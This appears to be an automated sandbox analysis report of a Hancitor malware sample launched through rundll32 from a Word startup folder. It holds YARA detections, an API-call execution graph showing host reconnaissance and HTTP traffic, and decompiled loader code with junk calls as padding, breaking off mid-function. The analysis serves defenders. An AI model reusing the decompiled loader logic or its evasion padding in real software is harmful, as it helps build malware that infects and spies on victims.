                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Target ID:4
                        Start time:12:39:04
                        Start date:26/04/2023
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX
                        Imagebase:0x7ff6c02f0000
                        File size:71168 bytes
                        MD5 hash:F68AF942FD7CCC0E7BAB1A2335D2AD26
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Target ID:5
                        Start time:12:39:04
                        Start date:26/04/2023
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX
                        Imagebase:0x220000
                        File size:61952 bytes
                        MD5 hash:D0432468FA4B7F66166C430E1334DBDA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Yara matches:
                        • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Hancitor_6738d84a, Description: unknown, Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Hancitor_6738d84a, Description: unknown, Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Hancitor, Description: Hancitor Payload, Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Hancitor_6738d84a, Description: unknown, Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Hancitor, Description: Hancitor Payload, Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                        Reputation:moderate

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:2.4%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:18.7%
                          Total number of Nodes:481
                          Total number of Limit Nodes:15
                          execution_graph 49234 27d21a8 49235 27d21bc 49234->49235 49237 27d21c5 49234->49237 49252 27d1abc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49235->49252 49238 27d21ee RtlEnterCriticalSection 49237->49238 49240 27d21f8 49237->49240 49245 27d21cd 49237->49245 49238->49240 49239 27d21c1 49239->49237 49239->49245 49240->49245 49246 27d20b4 49240->49246 49243 27d2319 RtlLeaveCriticalSection 49244 27d2323 49243->49244 49249 27d20c4 49246->49249 49247 27d20f0 49251 27d2114 49247->49251 49258 27d1ec8 9 API calls 49247->49258 49249->49247 49249->49251 49253 27d2028 49249->49253 49251->49243 49251->49244 49252->49239 49259 27d187c 49253->49259 49255 27d2038 49256 27d2045 49255->49256 49268 27d1f9c 9 API calls 49255->49268 49256->49249 49258->49251 49263 27d1898 49259->49263 49260 27d18a2 49269 27d1768 49260->49269 49263->49260 49264 27d18ae 49263->49264 49266 27d18f3 49263->49266 49273 27d15d4 49263->49273 49281 27d14d0 LocalAlloc 49263->49281 49264->49255 49282 27d16b0 VirtualFree 49266->49282 49268->49256 49271 27d17ae 49269->49271 49270 27d17de 49270->49264 49271->49270 49272 27d17ca VirtualAlloc 49271->49272 49272->49270 49272->49271 49274 27d15e3 VirtualAlloc 49273->49274 49276 27d1610 49274->49276 49277 27d1633 49274->49277 49283 27d1488 LocalAlloc 49276->49283 49277->49263 49279 27d161c 49279->49277 49280 27d1620 VirtualFree 49279->49280 49280->49277 49281->49263 49282->49264 49283->49279 49284 2842c48 49285 2842c52 49284->49285 49292 2835b20 49285->49292 49287 2842c68 49300 27fd844 121 API calls 49287->49300 49289 2842c99 49301 28316b0 43 API calls 49289->49301 49291 2842cc1 49293 2835b2a 49292->49293 49302 282fc9c 49293->49302 49297 2835b4c 49322 282c304 67 API calls 49297->49322 49299 2835b5d 49299->49287 49300->49289 49301->49291 49303 282fcad 49302->49303 49323 282c828 49303->49323 49305 282fcd1 49329 27f48f8 49305->49329 49307 282fcdc 49332 27f7afc 13 API calls 49307->49332 49309 282fcee 49333 27f7ca4 15 API calls 49309->49333 49311 282fd00 49312 282fd23 49311->49312 49313 282fd30 49311->49313 49334 27d40e8 11 API calls 49312->49334 49335 281c010 46 API calls 49313->49335 49316 282fd2e 49342 27d40e8 11 API calls 49316->49342 49317 282fd3f 49336 27d413c 49317->49336 49320 282fd93 49321 27f7e84 47 API calls 49320->49321 49321->49297 49322->49299 49324 282c832 49323->49324 49343 27f3854 49324->49343 49326 282c848 49347 27f7304 49326->49347 49328 282c867 49328->49305 49330 27f4908 VirtualAlloc 49329->49330 49331 27f4936 49329->49331 49330->49331 49331->49307 49332->49309 49333->49311 49334->49316 49335->49317 49337 27d4140 49336->49337 49340 27d4150 49336->49340 49337->49340 49367 27d41ac 11 API calls 49337->49367 49338 27d417e 49338->49316 49340->49338 49368 27d279c 11 API calls 49340->49368 49342->49320 49344 27f385b 49343->49344 49345 27f387e 49344->49345 49351 27f3a0c 42 API calls 49344->49351 49345->49326 49348 27f730a 49347->49348 49352 27f6848 49348->49352 49350 27f732c 49350->49328 49351->49345 49353 27f6863 49352->49353 49360 27f6830 RtlEnterCriticalSection 49353->49360 49357 27f686d 49358 27f68ca 49357->49358 49362 27d277c 49357->49362 49361 27f683c RtlLeaveCriticalSection 49358->49361 49359 27f691b 49359->49350 49360->49357 49361->49359 49363 27d2781 49362->49363 49365 27d2794 49362->49365 49363->49365 49366 27d288c 11 API calls 49363->49366 49365->49358 49366->49365 49367->49340 49368->49338 49369 28d73f0 49370 28d7415 49369->49370 49380 28d6820 49370->49380 49372 28d751f 49383 28d6d70 VirtualAlloc 49372->49383 49374 28d7558 49375 28d755c 49374->49375 49376 28d6820 VirtualAlloc 49374->49376 49377 28d756d 49376->49377 49378 28d75cf 49377->49378 49389 28d70d0 49377->49389 49381 28d6861 49380->49381 49382 28d6894 VirtualAlloc 49381->49382 49382->49372 49385 28d6dd8 49383->49385 49393 28d6b20 49385->49393 49386 28d6f6f 49386->49374 49387 28d6eb7 49387->49386 49388 28d6f41 VirtualProtect 49387->49388 49388->49387 49390 28d71c0 49389->49390 49391 28d70fe 49389->49391 49390->49377 49391->49390 49392 28d7156 VirtualProtect VirtualProtect 49391->49392 49392->49390 49394 28d6c00 49393->49394 49396 28d6b4e 49393->49396 49394->49387 49395 28d6b64 LoadLibraryExA 49395->49396 49396->49394 49396->49395 49397 28d6bc0 GetProcAddress 49396->49397 49397->49396 49398 42d19e0 49399 42d19ec 49398->49399 49400 42d19f1 49398->49400 49402 42d1870 49399->49402 49416 42d1390 49402->49416 49405 42d1390 2 API calls 49406 42d1895 49405->49406 49407 42d1390 2 API calls 49406->49407 49414 42d18a5 49407->49414 49408 42d197a 49408->49400 49410 42d195a Sleep 49446 42d15c0 49410->49446 49414->49408 49414->49410 49421 42d1aa0 49414->49421 49452 42d1630 56 API calls 49414->49452 49453 42d14e0 GetProcessHeap RtlAllocateHeap lstrcpyA 49414->49453 49417 42d139c GetProcessHeap 49416->49417 49418 42d13a7 49416->49418 49417->49418 49419 42d13b0 RtlAllocateHeap 49418->49419 49420 42d13c5 49418->49420 49419->49420 49420->49405 49454 42d1420 49421->49454 49434 42d1b69 49437 42d25b0 10 API calls 49434->49437 49435 42d1b2a 49487 42d25b0 49435->49487 49439 42d1b88 wsprintfA 49437->49439 49440 42d1ba6 49439->49440 49441 42d1390 2 API calls 49440->49441 49445 42d1bb9 49440->49445 49441->49445 49442 42d1c4a 49442->49414 49445->49442 49493 42d28d0 49445->49493 49513 42d2660 10 API calls 49445->49513 49449 42d15cf 49446->49449 49447 42d161e Sleep 49447->49414 49449->49447 49593 42d1740 RtlFreeHeap 49449->49593 49594 42d1630 56 API calls 49449->49594 49595 42d1980 RtlFreeHeap 49449->49595 49452->49414 49453->49414 49455 42d1434 GetVersion 49454->49455 49456 42d2630 49455->49456 49457 42d1abb 49456->49457 49458 42d2640 49456->49458 49460 42d30f0 GetComputerNameA 49457->49460 49514 42d1c70 49458->49514 49461 42d3135 lstrcatA 49460->49461 49462 42d3124 lstrcatA 49460->49462 49528 42d2df0 49461->49528 49462->49461 49465 42d1acd 49467 42d2520 49465->49467 49466 42d3157 lstrcatA 49466->49465 49468 42d254d 49467->49468 49469 42d2537 lstrcpyA 49467->49469 49558 42d1fe0 49468->49558 49470 42d1ad9 49469->49470 49475 42d23c0 DsEnumerateDomainTrustsA 49470->49475 49473 42d258a lstrcpyA 49473->49470 49474 42d256a lstrcpyA 49474->49470 49476 42d1ae8 49475->49476 49477 42d23f2 49475->49477 49480 42d3400 49476->49480 49477->49476 49478 42d2429 lstrcatA lstrcatA 49477->49478 49479 42d245b lstrcatA lstrcatA 49477->49479 49478->49477 49479->49477 49481 42d14a0 49480->49481 49482 42d3413 GetModuleHandleA 49481->49482 49483 42d342e GetProcAddress 49482->49483 49486 42d1b21 49482->49486 49484 42d344f GetSystemInfo 49483->49484 49485 42d3446 GetNativeSystemInfo 49483->49485 49484->49486 49485->49486 49486->49434 49486->49435 49488 42d25c4 49487->49488 49492 42d1b49 wsprintfA 49487->49492 49489 42d1390 2 API calls 49488->49489 49490 42d25dd 49489->49490 49581 42d2cd0 CryptAcquireContextA 49490->49581 49492->49440 49494 42d14a0 49493->49494 49495 42d28e6 lstrlenA 49494->49495 49496 42d2958 InternetCrackUrlA 49495->49496 49497 42d294b lstrlenA 49495->49497 49498 42d2975 49496->49498 49509 42d296e 49496->49509 49497->49496 49499 42d24f0 InternetOpenA 49498->49499 49498->49509 49500 42d299a 49499->49500 49501 42d29cb InternetConnectA 49500->49501 49500->49509 49502 42d29fb HttpOpenRequestA 49501->49502 49501->49509 49503 42d2a29 InternetCloseHandle 49502->49503 49504 42d2a3a 49502->49504 49503->49509 49505 42d2a79 HttpSendRequestA 49504->49505 49506 42d2a40 InternetQueryOptionA InternetSetOptionA 49504->49506 49507 42d2b0f InternetCloseHandle InternetCloseHandle 49505->49507 49508 42d2aa4 HttpQueryInfoA 49505->49508 49506->49505 49507->49509 49508->49507 49510 42d2acd 49508->49510 49509->49445 49510->49507 49511 42d2ad3 InternetReadFile 49510->49511 49512 42d2af0 49511->49512 49512->49507 49513->49445 49515 42d1390 2 API calls 49514->49515 49516 42d1c8e GetAdaptersAddresses 49515->49516 49518 42d1cb7 49516->49518 49522 42d13d0 49518->49522 49521 42d1d15 49521->49457 49523 42d13dc RtlFreeHeap 49522->49523 49524 42d13ef 49522->49524 49523->49524 49525 42d2490 GetWindowsDirectoryA 49524->49525 49526 42d24e5 49525->49526 49527 42d24b4 GetVolumeInformationA 49525->49527 49526->49521 49527->49526 49535 42d2e90 49528->49535 49533 42d2e4c lstrcpyA lstrcatA lstrcatA 49534 42d2e84 49533->49534 49534->49465 49534->49466 49536 42d1420 49535->49536 49537 42d2e9d K32EnumProcesses 49536->49537 49540 42d2ebb 49537->49540 49541 42d2e03 49537->49541 49539 42d2efc lstrcmpiA 49539->49540 49539->49541 49540->49539 49540->49541 49553 42d2f30 OpenProcess 49540->49553 49542 42d3000 OpenProcess 49541->49542 49543 42d3027 OpenProcessToken 49542->49543 49552 42d2e45 49542->49552 49544 42d3045 GetTokenInformation 49543->49544 49543->49552 49545 42d3064 GetLastError 49544->49545 49544->49552 49546 42d3073 49545->49546 49545->49552 49547 42d1390 2 API calls 49546->49547 49548 42d307c GetTokenInformation 49547->49548 49549 42d30d1 49548->49549 49550 42d30ab LookupAccountSidA 49548->49550 49551 42d13d0 RtlFreeHeap 49549->49551 49550->49549 49551->49552 49552->49533 49552->49534 49554 42d2feb 49553->49554 49555 42d2f57 K32GetProcessImageFileNameA FindCloseChangeNotification 49553->49555 49554->49540 49555->49554 49556 42d2f7f 49555->49556 49556->49554 49557 42d2fd6 lstrcpyA 49556->49557 49557->49554 49576 42d14a0 49558->49576 49561 42d205d 49572 42d2056 49561->49572 49578 42d24f0 49561->49578 49564 42d20b3 InternetConnectA 49565 42d20e3 HttpOpenRequestA 49564->49565 49564->49572 49566 42d2111 InternetCloseHandle 49565->49566 49567 42d2122 49565->49567 49566->49572 49568 42d2128 InternetQueryOptionA InternetSetOptionA 49567->49568 49569 42d2160 HttpSendRequestA HttpQueryInfoA 49567->49569 49568->49569 49570 42d2204 InternetCloseHandle InternetCloseHandle 49569->49570 49571 42d21a2 49569->49571 49570->49572 49571->49570 49573 42d21ba InternetReadFile 49571->49573 49572->49473 49572->49474 49574 42d21d9 49573->49574 49575 42d2200 49573->49575 49574->49571 49574->49575 49575->49570 49577 42d14ac InternetCrackUrlA 49576->49577 49577->49561 49577->49572 49579 42d24fc InternetOpenA 49578->49579 49580 42d2082 49578->49580 49579->49580 49580->49564 49580->49572 49582 42d2d1c CryptCreateHash 49581->49582 49588 42d2d12 49581->49588 49583 42d2d3b CryptHashData 49582->49583 49582->49588 49586 42d2d57 CryptDeriveKey 49583->49586 49583->49588 49584 42d2db7 49589 42d2dbd CryptDestroyKey 49584->49589 49590 42d2dce 49584->49590 49585 42d2da6 CryptDestroyHash 49585->49584 49587 42d2d7a CryptDecrypt 49586->49587 49586->49588 49587->49588 49588->49584 49588->49585 49589->49590 49591 42d2dd4 CryptReleaseContext 49590->49591 49592 42d2de7 49590->49592 49591->49592 49592->49492 49593->49449 49594->49449 49595->49449 49596 2862348 49603 27d6358 49596->49603 49604 27d6363 49603->49604 49622 27d3da8 49604->49622 49607 2861584 49846 27ee1f8 49607->49846 49609 28615ee 49610 28615fa GetEnhMetaFileW GetEnhMetaFileW 49609->49610 49610->49610 49611 2861617 49610->49611 49612 27d277c 11 API calls 49611->49612 49613 286164e 49612->49613 49850 27edb30 49613->49850 49615 2861666 15 API calls 49618 286174f 49615->49618 49616 2861824 49619 286183c 172 API calls 49616->49619 49620 2861fbb 49616->49620 49617 286177c 12 API calls 49617->49618 49618->49616 49618->49617 49619->49619 49619->49620 49621 27d3ff8 7 API calls 49620->49621 49623 27d3dee 49622->49623 49624 27d3ff8 49623->49624 49625 27d3e67 49623->49625 49628 27d4030 49624->49628 49631 27d4041 49624->49631 49636 27d3d48 49625->49636 49641 27d3f6c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 49628->49641 49630 27d403a 49630->49631 49632 27d407c FreeLibrary 49631->49632 49633 27d40a0 49631->49633 49632->49631 49634 27d40af ExitProcess 49633->49634 49635 27d40a9 49633->49635 49635->49634 49637 27d3d84 49636->49637 49638 27d3d57 49636->49638 49637->49607 49638->49637 49642 2838ed0 49638->49642 49656 27d5520 49638->49656 49641->49630 49643 2838eea GetVersion 49642->49643 49644 2838f48 49642->49644 49660 2838c80 GetCurrentProcessId 49643->49660 49644->49638 49648 2838f0e 49693 27ea8b4 44 API calls 49648->49693 49650 2838f18 49694 27ea860 44 API calls 49650->49694 49652 2838f28 49695 27ea860 44 API calls 49652->49695 49654 2838f38 49696 27ea860 44 API calls 49654->49696 49657 27d5530 GetModuleFileNameA 49656->49657 49659 27d554c 49656->49659 49827 27d575c GetModuleFileNameA RegOpenKeyExA 49657->49827 49659->49638 49697 27d9264 49660->49697 49663 27d413c 11 API calls 49664 2838cc9 49663->49664 49665 2838cd3 GlobalAddAtomA GetCurrentThreadId 49664->49665 49666 27d9264 42 API calls 49665->49666 49667 2838d0d 49666->49667 49668 27d413c 11 API calls 49667->49668 49669 2838d1a 49668->49669 49670 2838d24 GlobalAddAtomA 49669->49670 49700 27d45a8 49670->49700 49674 2838d51 49706 2838884 49674->49706 49676 2838d5b 49714 28386a0 49676->49714 49678 2838d67 49718 281b694 49678->49718 49680 2838d7a 49735 281cd08 49680->49735 49682 2838d90 49683 2838da6 49682->49683 49750 27ea9a0 44 API calls 49683->49750 49685 2838dba GetModuleHandleA 49686 2838dda 49685->49686 49687 2838dca GetProcAddress 49685->49687 49751 27d40e8 11 API calls 49686->49751 49687->49686 49689 2838def 49752 27d40e8 11 API calls 49689->49752 49691 2838df7 49692 27ea814 44 API calls 49691->49692 49692->49648 49693->49650 49694->49652 49695->49654 49696->49644 49753 27d9278 49697->49753 49701 27d45ac RegisterClipboardFormatA 49700->49701 49702 27eb488 49701->49702 49703 27eb48e 49702->49703 49704 27eb4a3 RtlInitializeCriticalSection 49703->49704 49705 27eb4b8 49704->49705 49705->49674 49707 28389f1 49706->49707 49708 2838898 SetErrorMode 49706->49708 49707->49676 49709 28388d8 49708->49709 49710 28388bc GetModuleHandleA GetProcAddress 49708->49710 49711 28389d3 SetErrorMode 49709->49711 49712 28388e5 LoadLibraryA 49709->49712 49710->49709 49711->49676 49712->49711 49713 2838901 10 API calls 49712->49713 49713->49711 49715 28386a6 49714->49715 49772 2838820 49715->49772 49717 2838714 49717->49678 49719 281b69e 49718->49719 49720 27f3854 42 API calls 49719->49720 49721 281b6bc 49720->49721 49785 281bc44 LoadCursorA 49721->49785 49724 281b6ff 49725 281b747 GetDC GetDeviceCaps ReleaseDC 49724->49725 49726 281b78d 49725->49726 49727 27f7304 13 API calls 49726->49727 49728 281b799 49727->49728 49729 27f7304 13 API calls 49728->49729 49730 281b7ae 49729->49730 49731 27f7304 13 API calls 49730->49731 49732 281b7c3 49731->49732 49790 281c1ec 49732->49790 49734 281b7d4 49734->49680 49736 281cd15 49735->49736 49737 27f3854 42 API calls 49736->49737 49738 281cd33 49737->49738 49739 281ce0b LoadIconA 49738->49739 49819 27fe1d0 49739->49819 49741 281ce36 GetModuleFileNameA OemToCharA 49742 281ce85 49741->49742 49743 281ceb9 CharLowerA 49742->49743 49744 281cede 49743->49744 49745 281cef0 49744->49745 49746 281cee8 49744->49746 49821 281f1a0 49745->49821 49825 281d0b8 60 API calls 49746->49825 49749 281cf22 49749->49682 49750->49685 49751->49689 49752->49691 49754 27d929c 49753->49754 49755 27d92c7 49754->49755 49766 27d8e6c 42 API calls 49754->49766 49757 27d92dc 49755->49757 49758 27d931f 49755->49758 49760 27d9315 49757->49760 49767 27d40e8 11 API calls 49757->49767 49768 27d4734 11 API calls 49757->49768 49769 27d8e6c 42 API calls 49757->49769 49771 27d41d8 11 API calls 49758->49771 49770 27d4734 11 API calls 49760->49770 49763 27d9273 49763->49663 49766->49755 49767->49757 49768->49757 49769->49757 49770->49763 49771->49763 49773 2838828 49772->49773 49774 283882f 49772->49774 49775 283882d 49773->49775 49778 283886b SendMessageA 49773->49778 49779 283885a SystemParametersInfoA 49773->49779 49776 2838845 49774->49776 49777 283883c 49774->49777 49775->49717 49784 28387a0 SystemParametersInfoA 49776->49784 49783 28387d0 6 API calls 49777->49783 49778->49775 49779->49775 49782 283884c 49782->49717 49783->49775 49784->49782 49786 281bc66 49785->49786 49787 281bc87 LoadCursorA 49786->49787 49789 281b6e6 GetKeyboardLayout 49786->49789 49808 281bda8 49787->49808 49789->49724 49791 281c205 49790->49791 49792 281c236 SystemParametersInfoA 49791->49792 49793 281c264 GetStockObject 49792->49793 49794 281c249 CreateFontIndirectA 49792->49794 49796 27f7694 16 API calls 49793->49796 49811 27f7694 49794->49811 49797 281c27b SystemParametersInfoA 49796->49797 49799 281c2d5 49797->49799 49800 281c29b CreateFontIndirectA 49797->49800 49816 27f7778 16 API calls 49799->49816 49801 27f7694 16 API calls 49800->49801 49803 281c2b7 CreateFontIndirectA 49801->49803 49805 27f7694 16 API calls 49803->49805 49804 281c2e8 GetStockObject 49806 27f7694 16 API calls 49804->49806 49807 281c2d3 49805->49807 49806->49807 49807->49734 49809 27d277c 11 API calls 49808->49809 49810 281bdc1 49809->49810 49810->49786 49817 27f7250 GetObjectA 49811->49817 49813 27f76a6 49818 27f7488 15 API calls 49813->49818 49815 27f76af 49815->49797 49816->49804 49817->49813 49818->49815 49820 27fe1dc 49819->49820 49820->49741 49822 281f1c6 49821->49822 49823 281f1b6 49821->49823 49822->49749 49826 27ff578 11 API calls 49823->49826 49825->49745 49826->49822 49828 27d57df 49827->49828 49829 27d579f RegOpenKeyExA 49827->49829 49845 27d55a4 12 API calls 49828->49845 49829->49828 49830 27d57bd RegOpenKeyExA 49829->49830 49830->49828 49832 27d5868 lstrcpyn GetThreadLocale GetLocaleInfoA 49830->49832 49834 27d589f 49832->49834 49835 27d5982 49832->49835 49833 27d5804 RegQueryValueExA 49836 27d5824 RegQueryValueExA 49833->49836 49837 27d5842 RegCloseKey 49833->49837 49834->49835 49839 27d58af lstrlen 49834->49839 49835->49659 49836->49837 49837->49659 49840 27d58c7 49839->49840 49840->49835 49841 27d58ec lstrcpyn LoadLibraryExA 49840->49841 49842 27d5914 49840->49842 49841->49842 49842->49835 49843 27d591e lstrcpyn LoadLibraryExA 49842->49843 49843->49835 49844 27d5950 lstrcpyn LoadLibraryExA 49843->49844 49844->49835 49845->49833 49847 27ee202 49846->49847 49854 27ee2c0 FindResourceA 49847->49854 49849 27ee230 49849->49609 49851 27edb5e 49850->49851 49852 27edb3d 49850->49852 49851->49615 49852->49851 49866 27dbc80 42 API calls 49852->49866 49855 27ee2ec LoadResource 49854->49855 49856 27ee2e5 49854->49856 49857 27ee2ff 49855->49857 49858 27ee306 SizeofResource LockResource 49855->49858 49864 27ee250 42 API calls 49856->49864 49865 27ee250 42 API calls 49857->49865 49861 27ee324 49858->49861 49861->49849 49862 27ee2eb 49862->49855 49863 27ee305 49863->49858 49864->49862 49865->49863 49866->49851

                          Executed Functions

                          Function 02861584 Relevance: 359.4, APIs: 201, Strings: 4, Instructions: 605filelibrarymemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 96%
                          			E02861584(intOrPtr __eax, void* __ebx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				long _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _t76;
				intOrPtr* _t81;
				intOrPtr _t85;
				intOrPtr* _t87;
				intOrPtr _t89;
				void* _t110;
				signed int* _t113;
				signed int* _t114;
				signed int* _t121;
				intOrPtr _t124;
				struct HICON__* _t125;
				signed int* _t126;
				int _t129;
				int _t130;
				signed int* _t131;
				struct HICON__* _t236;
				signed int* _t237;
				struct HICON__* _t240;
				struct HICON__* _t241;
				struct HICON__* _t242;
				struct HICON__* _t243;
				struct HICON__* _t244;
				struct HICON__* _t245;
				struct HICON__* _t246;
				struct HICON__* _t247;
				struct HICON__* _t248;
				struct HICON__* _t249;
				struct HICON__* _t250;
				struct HICON__* _t251;
				struct HICON__* _t252;
				struct HICON__* _t253;
				struct HICON__* _t254;
				struct HICON__* _t255;
				struct HICON__* _t256;
				struct HICON__* _t257;
				struct HICON__* _t258;
				struct HICON__* _t259;
				struct HICON__* _t260;
				struct HICON__* _t261;
				struct HICON__* _t262;
				struct HICON__* _t263;
				struct HICON__* _t264;
				struct HICON__* _t265;
				struct HICON__* _t266;
				struct HICON__* _t267;
				struct HICON__* _t268;
				struct HICON__* _t269;
				struct HICON__* _t270;
				signed int* _t271;
				signed int* _t318;
				intOrPtr _t362;
				intOrPtr _t368;
				intOrPtr _t373;
				intOrPtr _t376;
				intOrPtr _t377;
				intOrPtr _t378;

				_t376 = _t377;
				_t378 = _t377 + 0xffffffa4;
				_v96 = __eax;
				_v88 = 0x64c;
				_v72 = 0x5f2;
				_v76 = 0x980;
				_v80 = 0x10f6;
				_v84 = 0x1484;
				_v92 = 0x1bf0;
				_v32 = 0x83f0;
				_v40 = 2;
				_v44 = 0x7b;
				_v48 = 0;
				_t362 =  *0x2865668; // 0x27d0000
				_t76 = E027EE1F8(_t362, 1, 0x1205, "gyy"); // executed
				 *0x2865d10 = _t76;
				_v72 = 0x569f6c;
				do {
					GetEnhMetaFileW(0x2861ffc); // executed
					GetEnhMetaFileW(0x2861ffc);
					_v72 = _v72 - 1;
				} while (_v72 != 0);
				_v8 = _t378;
				_v8 = _v8 + 0xa8;
				_v12 = _t376;
				_v12 = _v12 + 0x64;
				_v16 =  *0x02865658;
				_v20 =  *0x02865654;
				_t81 =  *0x2865d10; // 0x41d2090
				_v52 =  *((intOrPtr*)( *_t81))();
				 *0x2865d14 = E027D277C(_v52);
				_t368 =  *0x2865d14; // 0x41d20b0
				_t85 =  *0x2865d10; // 0x41d2090
				E027EDB30(_t85, _v52, _t368);
				_t87 =  *0x2865d14; // 0x41d20b0
				_v28 =  *_t87;
				_t89 =  *0x2865d14; // 0x41d20b0
				 *0x2865d14 = _t89 + 4;
				_v64 = 0x1c33;
				_v68 = 0x1909;
				AddFontResourceA(0x2861ffc);
				AddFontResourceA(0x2861ffc);
				AddFontResourceA(0x2861ffc);
				AddFontResourceA(0x2861ffc);
				AddFontResourceA(0x2861ffc);
				AddFontResourceA(0x2861ffc);
				AddFontResourceA(0x2861ffc);
				AddFontResourceA(0x2861ffc);
				AddFontResourceA(0x2861ffc);
				AddFontResourceA(0x2861ffc);
				AddFontResourceA(0x2861ffc);
				AddFontResourceA(0x2861ffc);
				 *0x2865d20 = GetProcAddress(LoadLibraryA("kernel32"), "VirtualAllocEx");
				_t110 = VirtualAllocEx(0xffffffff, 0, _v52, _v64 - 0xc33, _v68 - 0x18c9); // executed
				 *0x2865d1c = _t110;
				E027D6F10();
				_t113 =  *0x2865d1c; // 0x28d7800
				 *0x2865d18 = _t113;
				_t114 =  *0x2865d18; // 0x28cfffc
				 *0x2865d18 = _t114 - 4;
				_v56 = 0;
				_v60 = 0;
				while(_v56 < _v52) {
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					_t373 =  *0x2865d14; // 0x41d20b0
					_t318 =  *0x2865d1c; // 0x28d7800
					E027D6F08(_t318 + _v60, _t373 + _v56);
					_v60 = _v60 + _v44;
					_v56 = _v56 + _v44;
					_v56 = _v56 + _v48;
				}
				_v84 = 0x8a58a;
				_v72 = 0;
				while(_v72 < _v28) {
					_t125 = LoadCursorW(0, 0xe49);
					_t126 =  *0x2865d1c; // 0x28d7800
					_t129 = DeleteObject(0);
					_t130 = DeleteObject(0);
					_t131 =  *0x2865d1c; // 0x28d7800
					 *_t131 = _t125 +  *_t126 + _v72 + _t129 - _t130;
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
